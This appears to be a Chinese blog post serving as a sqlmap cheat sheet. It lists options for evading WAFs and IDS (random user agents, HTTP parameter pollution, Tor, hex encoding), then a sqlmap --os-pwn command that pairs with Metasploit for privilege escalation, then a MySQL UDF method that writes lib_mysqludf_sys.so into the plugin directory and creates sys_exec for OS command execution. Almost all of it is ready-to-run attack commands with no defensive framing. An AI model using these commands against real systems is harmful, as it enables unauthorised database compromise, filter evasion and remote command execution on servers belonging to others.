sqlmap基本用法就不多介绍了,本文涉及一些参数绕过技巧,以及metasploit + sqlmap结合用法
0x01 常用
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
--delay 2 #间隔两秒发送数据包
--time-sec 2 #时间盲注 默认为5秒
--force-ssl #请求是HTTPS使用,或者Host头后加上:443
--identify-waf #尝试找出WAF/IPS/IDS保护 #首选
--priv-esc #数据库进程用户权限提升
--proxy=ip:port #代理进行注入
--invalid-bignum #指定报错数值
--invalid-logical #指定无效逻辑 re:id=-1的报错改成id=1 AND 1=2。
--risk 1、会测试大部分的测试语句,
2、会增加基于事件的测试语句,
3、会增加OR语句的SQL注入测试。
--technique #指定sqlmap使用的探测技术,默认情况下会测试所有的方式 [xml/payload目录]
B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可多语句查询注入)
T: Time-based blind SQL injection(基于时间延迟注入)
|
Re:在UPDATE的语句中,注入一个OR的测试语句,可能导致更新的整个表,可能造成很大的风险。
0x02 参数绕过
|
1
2
3
4
5
6
7
8
9
|
--hex #或者使用参数 --no-cast、进行字符码转换
--mobile #对移动端的服务器进行注入
--ignore-proxy #禁止使用系统的代理
--random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
--hpp -v 3 #使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--delay=5 --time-sec=60 #不多说,必备
--proxy=(http|https|socks4|socks5)://ip:port --proxy-cred=username:password
--tor -tor-type=SOCKS5 --tor-port=8080 --check-tor
--eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
|
0x03 sqlmap + metasploit
利用条件:
root |sa| dba
GPC关闭(能使用单引号)
有绝对路径(读文件可以不用,写文件必须)
没有配置–secure-file-priv
|
1
|
sqlmap -u "http://192.168.6.15/phpinfo.php?user=root" --random-agent --os-pwn --msf-path /usr/share/metasploit-framework/ --priv-esc -v 1
|
如需修改metasploit生成的木马为64位。需要修改metasploit.py文件
默认生成的木马存放在/tmp目录下,–tmp-path=TMPPATH指定tmp路径
0x04 mysql_udf
|
1
2
3
4
5
6
7
8
9
10
|
sqlmap -u 'http://xxxx' --sql-shell
show variables like "%plugin%";
sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/
激活存储过程「sys_exec」函数:
sqlmap -u 'http://xxxx' --sql-shell
CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so
SELECT * FROM information_schema.routines
sys_exec(id);
|
扫一扫
2549
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
